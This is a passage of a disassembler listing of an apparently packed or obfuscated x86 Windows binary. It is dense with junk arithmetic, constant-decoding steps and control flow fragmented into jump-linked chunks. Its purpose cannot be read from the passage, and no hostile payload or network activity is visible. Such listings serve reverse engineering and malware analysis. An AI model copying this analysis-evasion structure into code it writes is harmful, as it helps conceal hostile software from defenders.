sub_427852 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CB3
loc_427860: ; CODE XREF: sub_425CB3+B14�j
call sub_42897B
push offset loc_424C6A
jmp nullsub_120
; END OF FUNCTION CHUNK FOR sub_425CB3
; ---------------------------------------------------------------------------
adc ebx, edx
jmp sub_4235C9
; ---------------------------------------------------------------------------
locret_427876: ; CODE XREF: hjohnhn9:00424B2B�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4242A0
loc_427877: ; CODE XREF: sub_4242A0+A�j
call sub_427463
loc_42787C: ; CODE XREF: hjohnhn9:00428472�j
jmp loc_42879B
; END OF FUNCTION CHUNK FOR sub_4242A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_427881: ; CODE XREF: sub_425BD2+1D8C�j
jmp loc_426F24
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42859A
loc_427886: ; CODE XREF: sub_42859A+11�j
mov edx, 0B9726E5Ah
push offset sub_425BD2
jmp locret_424207
; END OF FUNCTION CHUNK FOR sub_42859A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426671
loc_427895: ; CODE XREF: sub_426671-649�j
jz loc_423FD3
jmp loc_42631C
; END OF FUNCTION CHUNK FOR sub_426671
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426961
loc_4278A0: ; CODE XREF: sub_426961:loc_42784B�j
rol eax, 1Dh
or eax, 0F6D1A721h
add eax, 4A7172h
xchg eax, [esp+0]
jmp loc_42681D
; END OF FUNCTION CHUNK FOR sub_426961
; ---------------------------------------------------------------------------
loc_4278B7: ; CODE XREF: hjohnhn9:0042683B�j
xchg esi, [eax]
; =============== S U B R O U T I N E =======================================
sub_4278B9 proc near ; CODE XREF: sub_427A58-3B3D�p
; FUNCTION CHUNK AT 0042340D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00423948 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282CE SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov [ebp-4], eax
loc_4278C0: ; CODE XREF: sub_427C9B:loc_4246F4�j
cmp dword ptr [ebp-4], 0
jnz loc_423415
lea eax, [ebp-125h]
push eax
jmp loc_423948
sub_4278B9 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423425
loc_4278D7: ; CODE XREF: sub_423425+9�j
jmp loc_4282D8
; END OF FUNCTION CHUNK FOR sub_423425
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4278DC proc near ; CODE XREF: sub_42387A+2E17�j
; sub_428CC9+1�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423785 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00423D54 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042438A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00424BA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424C01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042515B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00427A24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427B35 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00427F70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042808F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00428571 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FEC SIZE 0000001C BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
xchg edi, [esp+0]
mov ebp, edi
jmp loc_427F70
sub_4278DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4278EC proc near ; DATA XREF: sub_4262DA+7�o
; FUNCTION CHUNK AT 0042382E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042434F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004243F7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042740A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004279E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427D42 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00427EAB SIZE 0000001D BYTES
mov ds:dword_423940, eax
jmp loc_427EAB
sub_4278EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4278F6 proc near ; CODE XREF: sub_427A36�j
; FUNCTION CHUNK AT 00423B97 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
push offset sub_428E65
jmp loc_423B97
sub_4278F6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427994
loc_427904: ; CODE XREF: sub_427994-11F8�j
jz loc_423AE4
jmp loc_42469E
; END OF FUNCTION CHUNK FOR sub_427994
; =============== S U B R O U T I N E =======================================
sub_42790F proc near ; DATA XREF: sub_426211-1CD9�o
add edi, 0FD021EE1h
mov [edi], eax
push offset loc_428FCC
jmp loc_426BC5
sub_42790F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_427921: ; CODE XREF: sub_427486:loc_423246�j
jz loc_428004
; END OF FUNCTION CHUNK FOR sub_427486
; START OF FUNCTION CHUNK FOR sub_426354
loc_427927: ; CODE XREF: sub_426354-741�j
jmp loc_425E20
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424877
loc_42792C: ; CODE XREF: sub_424877:loc_42465A�j
jmp nullsub_67
; END OF FUNCTION CHUNK FOR sub_424877
; ---------------------------------------------------------------------------
xchg ecx, [esi]
mov [ecx], ebx
adc edi, 9915B2EFh
cdq
add ecx, 35122E90h
jmp loc_428004
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_427947: ; CODE XREF: sub_42466E:loc_424008�j
; sub_4260BD+166A�j
shr ecx, 1Bh
; END OF FUNCTION CHUNK FOR sub_42466E
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_42794A: ; CODE XREF: sub_4260BD:loc_4282E4�j
mov byte ptr [ebp-20h], 30h
inc dword ptr [ebp-10h]
; END OF FUNCTION CHUNK FOR sub_4260BD
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_427951: ; CODE XREF: sub_426354:loc_423350�j
; sub_423753+8�j ...
dec dword ptr [ebp-10h]
cmp dword ptr [ebp-10h], 0
jl loc_428DA6
jmp loc_427881
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
test eax, eax
jz loc_42476D
jmp loc_42500A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_427970: ; CODE XREF: sub_424631-6D1�j
call sub_427AEB
call sub_423548
loc_42797A: ; CODE XREF: sub_424EC9+3B6C�j
jmp nullsub_31
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_42797F: ; CODE XREF: sub_42466E+1744�j
jmp sub_4279ED
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_427984: ; CODE XREF: sub_424A78-A7B�j
jmp loc_426DAA
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
loc_427989: ; CODE XREF: hjohnhn9:0042506C�j
jz loc_42750E
jmp loc_4234C3
; =============== S U B R O U T I N E =======================================
sub_427994 proc near ; CODE XREF: hjohnhn9:0042811F�j
; sub_428BCF+F�p
; FUNCTION CHUNK AT 004239EC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004261F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042678E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427904 SIZE 0000000B BYTES
xchg edi, [esp+0]
pop edi
add esp, 8
mov [ebp-4], eax
push 0C81D22B2h
pop eax
jmp loc_4261F1
sub_427994 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_4279A9: ; CODE XREF: sub_4279C0+63F�j
mov eax, [ebp+var_4]
xchg edi, [esp+4+var_4]
mov ecx, edi
pop edi
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_4279C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_4279B6: ; CODE XREF: sub_426A78+7�j
jmp loc_427B1B
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_4279BB: ; CODE XREF: sub_42363F+4�j
jmp loc_425C7D
; END OF FUNCTION CHUNK FOR sub_42363F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4279C0 proc near ; CODE XREF: sub_4279C0-1603�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00423D42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042446C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004249CC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042507B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425E85 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00425F5B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004263B1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004279A9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427FF5 SIZE 0000000F BYTES
push ebp
mov ebp, esp
jmp loc_423D42
sub_4279C0 endp
; =============== S U B R O U T I N E =======================================
sub_4279C8 proc near ; DATA XREF: sub_424C5F+C�o
; FUNCTION CHUNK AT 00429013 SIZE 00000005 BYTES
call sub_4262C5
push offset loc_42903E
jmp loc_429013
sub_4279C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427324
loc_4279D7: ; CODE XREF: sub_427324+11A2�j
mov ds:dword_4252C4, eax
retn
; END OF FUNCTION CHUNK FOR sub_427324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_4279DE: ; CODE XREF: sub_424161+1A62�j
jmp loc_4234B1
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_4279E3: ; CODE XREF: sub_428477-3677�j
jmp loc_4287A5
; END OF FUNCTION CHUNK FOR sub_428477
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278EC
loc_4279E8: ; CODE XREF: sub_4278EC-40B7�j
jmp loc_427D42
; END OF FUNCTION CHUNK FOR sub_4278EC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4279ED proc near ; CODE XREF: sub_423B05-CA�p
; sub_426F5A-30B5�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004244A3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00424AA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C76 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jns sub_4289B2
add esp, 0FFFFFED8h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
jmp loc_424C76
sub_4279ED endp
; =============== S U B R O U T I N E =======================================
sub_427A07 proc near ; DATA XREF: hjohnhn9:004237CD�o
cmp dword ptr [ebp-8], 0
jz loc_42909E
sub_427A07 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_426354
loc_427A11: ; CODE XREF: sub_426354+AB9�j
; hjohnhn9:00429098�j
js loc_426302
cmp dword ptr [ebp-1Ch], 0Fh
jmp loc_42323C
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
mov ecx, [edx]
mov edi, edx
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_427A24: ; CODE XREF: sub_4278DC-3B82�j
jmp sub_428CAF
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
not ebx
jmp sub_428D1E
; =============== S U B R O U T I N E =======================================
sub_427A30 proc near ; CODE XREF: sub_426B29:loc_427D8E�p
mov eax, 0A0h
retn
sub_427A30 endp
; =============== S U B R O U T I N E =======================================
sub_427A36 proc near ; CODE XREF: sub_427A58-3B42�p
; sub_427E85-3CF7�p ...
; FUNCTION CHUNK AT 004262A3 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042888D SIZE 00000005 BYTES
js sub_4278F6
push ebp
mov ebp, esp
jmp loc_4262A3
sub_427A36 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_427A44: ; CODE XREF: sub_423B05:loc_4233E1�j
add eax, ebp
add eax, 48CFDDBEh
mov eax, [eax]
push offset loc_423D87
jmp nullsub_85
; END OF FUNCTION CHUNK FOR sub_423B05
; =============== S U B R O U T I N E =======================================
sub_427A58 proc near ; CODE XREF: hjohnhn9:004266C7�j
; sub_4284CB-507�p
; FUNCTION CHUNK AT 00423F10 SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
mov [ebp-4], eax
mov eax, offset dword_425AEC
jmp loc_423F10
sub_427A58 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BD2
loc_427A69: ; CODE XREF: sub_426BD2:loc_4235C4�j
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_426BD2
; ---------------------------------------------------------------------------
loc_427A6C: ; CODE XREF: hjohnhn9:004235B7�j
mov eax, [ebp+8]
cmp dword ptr [eax-0Ch], 4
jnz loc_426B63
; START OF FUNCTION CHUNK FOR sub_427B7A
loc_427A79: ; CODE XREF: sub_427B7A+4�j
jmp loc_426B5A
; END OF FUNCTION CHUNK FOR sub_427B7A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_427A7E: ; CODE XREF: sub_423BC3+60A�j
jz loc_428FAE
shl ebp, 1Bh
jmp loc_428F9F
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
push ebx
mov ebx, ebp
xchg ebx, [esp]
mov ebp, esp
add esp, 0FFFFFFCCh
jmp loc_423145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_427A9C: ; CODE XREF: sub_4265CD-257C�j
jnz loc_42352D
; END OF FUNCTION CHUNK FOR sub_4265CD
; START OF FUNCTION CHUNK FOR sub_427C53
loc_427AA2: ; CODE XREF: sub_427C53+9�j
jmp sub_426F85
; END OF FUNCTION CHUNK FOR sub_427C53
; ---------------------------------------------------------------------------
ror ebp, 19h
xor ebp, 0D5414480h
jmp loc_42352B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_427AB5: ; CODE XREF: sub_426354+24A4�j
jnz loc_428BAC
jmp loc_423451
; END OF FUNCTION CHUNK FOR sub_426354
; =============== S U B R O U T I N E =======================================
sub_427AC0 proc near ; CODE XREF: hjohnhn9:004237DD�j
; sub_42325E:loc_424261�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042390C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00423B3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424251 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424703 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00424D04 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425C3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426393 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004283A1 SIZE 00000018 BYTES
xchg ebx, [esp+0]
pop ebx
push ecx
push 8CD3AF68h
jmp loc_426393
sub_427AC0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A28
loc_427ACF: ; CODE XREF: sub_424A28+3FA3�j
jz sub_42677F
jmp loc_4284A7
; END OF FUNCTION CHUNK FOR sub_424A28
; ---------------------------------------------------------------------------
xor edx, 31C7C26Fh
and ebp, 901DEA2Fh
jmp sub_425BF2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427AEB proc near ; CODE XREF: sub_426749-300D�p
; sub_427C9B-2197�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
jz sub_424377
add esp, 0FFFFFFF8h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
jmp loc_424491
sub_427AEB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42841F
loc_427B02: ; CODE XREF: sub_42841F:loc_423810�j
cdq
test eax, 0C9C7E8BAh
jmp loc_426588
; END OF FUNCTION CHUNK FOR sub_42841F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_427B0E: ; CODE XREF: sub_424819:loc_426A09�j
xor eax, 4E22A3B1h
add eax, ebp
call sub_423FB9
; END OF FUNCTION CHUNK FOR sub_424819
; START OF FUNCTION CHUNK FOR sub_426A78
loc_427B1B: ; CODE XREF: sub_426A78:loc_4279B6�j
push 0FA814B42h
pop eax
xor eax, 0CA5BD9A7h
rol eax, 11h
test eax, 200000h
jmp loc_423D47
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_427B35: ; CODE XREF: sub_4278DC-3B7A�j
push 0BCDFDBAAh
mov ecx, ebp
loc_427B3C: ; CODE XREF: sub_4278DC:loc_424BA3�j
call sub_424877
mov edx, 4CB976E9h
call sub_4279ED
push eax
jmp loc_423785
; END OF FUNCTION CHUNK FOR sub_4278DC
; =============== S U B R O U T I N E =======================================
sub_427B51 proc near ; CODE XREF: hjohnhn9:00423EB2�j
; sub_426354-51F�p
; FUNCTION CHUNK AT 00428174 SIZE 0000000F BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-8], eax
loc_427B58: ; CODE XREF: sub_426354:loc_4262EB�j
; sub_426354-4E�j
js loc_428174
test byte ptr [ebp-8], 2
jz loc_424C37
jmp sub_4241D2
sub_427B51 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427B6D: ; CODE XREF: hjohnhn9:00426250�j
jnb loc_424A5E
cmp edi, ecx
jmp loc_426632
; =============== S U B R O U T I N E =======================================
sub_427B7A proc near ; CODE XREF: hjohnhn9:00424B7B�j
; hjohnhn9:00428CA5�p
; FUNCTION CHUNK AT 00426B5A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00427A79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042856C SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
jmp loc_427A79
sub_427B7A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call sub_4263C7
loc_427B88: ; CODE XREF: hjohnhn9:004268CE�j
jmp loc_428A3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_427B8D: ; CODE XREF: sub_426F5A-1E18�j
jmp loc_427339
; END OF FUNCTION CHUNK FOR sub_426F5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CCD
loc_427B92: ; CODE XREF: sub_423CCD+9�j
jmp loc_4271DA
; END OF FUNCTION CHUNK FOR sub_423CCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CB3
loc_427B97: ; CODE XREF: sub_425CB3-246D�j
jmp loc_4267AC
; END OF FUNCTION CHUNK FOR sub_425CB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_427B9C: ; CODE XREF: sub_423CDB+3A9�j
; sub_423CDB:loc_426B13�j ...
call sub_424877
push 96560501h
xchg ebx, [esp+0]
mov edx, ebx
pop ebx
jmp loc_425EFB
; END OF FUNCTION CHUNK FOR sub_423CDB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_427BB2: ; CODE XREF: hjohnhn9:loc_425D60�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_427BB3: ; CODE XREF: sub_4248F9+6�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_426A30
; ---------------------------------------------------------------------------
loc_427BB5: ; CODE XREF: hjohnhn9:004268D5�j
mov eax, [ebp-4]
call sub_428838
; START OF FUNCTION CHUNK FOR sub_42325E
loc_427BBD: ; CODE XREF: sub_42325E:loc_423265�j
jz loc_428B4C
adc ebx, 3722B6D7h
jmp loc_426FE2
; END OF FUNCTION CHUNK FOR sub_42325E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427BCE proc near ; DATA XREF: sub_4230F2+1�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00427380 SIZE 0000000B BYTES
mov ebp, esp
push ecx
mov esp, ebp
xchg edi, [esp+4+var_4]
mov ebp, edi
pop edi
mov eax, ds:dword_428B08
or eax, eax
jmp loc_427380
sub_427BCE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_427BE6: ; CODE XREF: sub_424161+15�j
mov eax, [ebp-20h]
call sub_426C1C
loc_427BEE: ; CODE XREF: sub_42466E-635�j
jmp loc_42458F
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_427BF3: ; CODE XREF: sub_423B05:loc_423A2B�j
; sub_42387A:loc_4270E3�j
add eax, 132B10CCh
add eax, ebp
loc_427BFB: ; CODE XREF: sub_423B05:loc_423648�j
add eax, 0EE6D4C16h
mov eax, [eax]
push eax
call sub_4237F4
jmp loc_4238B5
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
ror esi, 11h
sbb edx, esi
jmp sub_4289A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_427C18: ; CODE XREF: sub_4262C5:loc_4264EB�j
add [ebp-0Ah], al
xor eax, eax
mov al, [ebp-0Ah]
shr eax, 4
xor [ebp-0Ah], al
inc dword ptr [ebp-8]
inc dword ptr [ebp-4]
loc_427C2C: ; CODE XREF: hjohnhn9:loc_428A5B�j
jmp loc_42761C
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
loc_427C31: ; DATA XREF: sub_4278EC-4DA�o
cmp al, 0A4h
jnz loc_427D5C
jmp loc_4274AD
; ---------------------------------------------------------------------------
jmp loc_427D5C
; =============== S U B R O U T I N E =======================================
sub_427C43 proc near ; CODE XREF: sub_428183-4E4A�j
; hjohnhn9:00424305�p ...
push offset loc_424B1C
jmp nullsub_37
sub_427C43 endp
; ---------------------------------------------------------------------------
loc_427C4D: ; CODE XREF: hjohnhn9:004237B8�j
mov ds:dword_4252D0, eax
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427C53 proc near ; CODE XREF: sub_426D17-3817�p
; hjohnhn9:0042379F�p ...
; FUNCTION CHUNK AT 00427AA2 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jno sub_428D0E
jmp loc_427AA2
sub_427C53 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_427C61: ; CODE XREF: sub_427C9B-359E�j
mov eax, ebp
loc_427C63: ; CODE XREF: sub_427C9B:loc_423433�j
xor ecx, 0BCAAC869h
cmp ecx, 0FCF34Fh
jmp loc_424512
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
loc_427C74: ; DATA XREF: sub_4269BD-28A0�o
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_4252DC[eax*4]
mov [ebp-8], eax
jmp loc_428368
; ---------------------------------------------------------------------------
sub ebx, ecx
cmp esi, 63D9B48Bh
jmp loc_425DDE
; ---------------------------------------------------------------------------
loc_427C99: ; CODE XREF: hjohnhn9:00426045�j
xor esi, ecx
; =============== S U B R O U T I N E =======================================
sub_427C9B proc near ; CODE XREF: sub_424161+2506�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423433 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423771 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424208 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424496 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042451C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004246A8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004246F4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424F76 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00425AF0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004260C3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426176 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426870 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426DFA SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00427195 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00427C61 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427E76 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042858D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004289DB SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00428E0C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429050 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429112 SIZE 0000000A BYTES
xchg edi, [esp+4+var_4]
pop edi
add eax, ebp
add eax, 9A0058C7h
jmp loc_427D2F
; ---------------------------------------------------------------------------
not eax
jmp loc_426DFA
; ---------------------------------------------------------------------------
loc_427CB3: ; CODE XREF: hjohnhn9:loc_426E70�j
jge loc_4246AB
loc_427CB9: ; CODE XREF: sub_426A78-18EB�j
jmp loc_4260C3
; ---------------------------------------------------------------------------
jbe loc_42627F
jmp loc_4246A8
; ---------------------------------------------------------------------------
xchg eax, [edx]
jmp sub_4246DB
; ---------------------------------------------------------------------------
loc_427CD0: ; DATA XREF: sub_427DE6-1993�o
push eax
push 0
call sub_424345
loc_427CD8: ; DATA XREF: sub_425EA9-169D�o
or eax, eax
jnz locret_427CE5
loc_427CE0: ; CODE XREF: sub_425EA9:loc_424801�j
call sub_425B19
locret_427CE5: ; CODE XREF: sub_427C9B+3F�j
retn
; ---------------------------------------------------------------------------
loc_427CE6: ; CODE XREF: hjohnhn9:loc_428626�j
jl loc_42719E
loc_427CEC: ; CODE XREF: sub_426523+1F45�j
jmp nullsub_79
; ---------------------------------------------------------------------------
js loc_42323C
jmp loc_427195
; ---------------------------------------------------------------------------
loc_427CFC: ; CODE XREF: sub_424698:loc_427657�j
sub edx, 386F283Ah
and edx, 7878DEA8h
add edx, 7B703C08h
call sub_4279ED
loc_427D13: ; CODE XREF: sub_42325E:loc_4231DA�j
push eax
jmp loc_424208
; ---------------------------------------------------------------------------
loc_427D19: ; CODE XREF: sub_4250FC-1FDC�j
test ecx, 400000h
jmp loc_427E76
; ---------------------------------------------------------------------------
loc_427D24: ; CODE XREF: sub_425B34:loc_425B43�j
sub esi, 0E320DB65h
jmp loc_425AF0
; ---------------------------------------------------------------------------
loc_427D2F: ; CODE XREF: sub_427C9B+C�j
mov eax, [eax]
and dword ptr [eax+24h], 7FFFFFFFh
push offset loc_426150
jmp nullsub_38
sub_427C9B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278EC
loc_427D42: ; CODE XREF: sub_4278EC:loc_4279E8�j
jnz loc_4243F7
call sub_425EA9
mov edx, 0E5254649h
call sub_427C53
mov ds:dword_423944, eax
loc_427D5C: ; CODE XREF: sub_426D6A:loc_426D87�j
; hjohnhn9:00427C33�j ...
mov esp, ebp
pop ebp
push ds:dword_423944
jmp nullsub_44
; END OF FUNCTION CHUNK FOR sub_4278EC
; =============== S U B R O U T I N E =======================================
sub_427D6A proc near ; DATA XREF: sub_424EC9+3B67�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004231A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425121 SIZE 0000001B BYTES
push 87648E19h
pop edi
and edi, 36F77563h
sub edi, 1D14370Fh
jmp loc_4231A3
sub_427D6A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_427D81: ; CODE XREF: sub_427564-3ABA�j
test ecx, edi
jmp loc_428906
; END OF FUNCTION CHUNK FOR sub_427564
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_427D89: ; CODE XREF: sub_424631+2302�j
jmp loc_424F28
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B29
loc_427D8E: ; CODE XREF: sub_426B29-1896�j
; sub_426B29-188A�j
call sub_427A30
push offset loc_427619
jmp nullsub_39
; END OF FUNCTION CHUNK FOR sub_426B29
; =============== S U B R O U T I N E =======================================
sub_427D9D proc near ; DATA XREF: sub_424631:loc_428DD1�o
; FUNCTION CHUNK AT 00424ED3 SIZE 0000001E BYTES
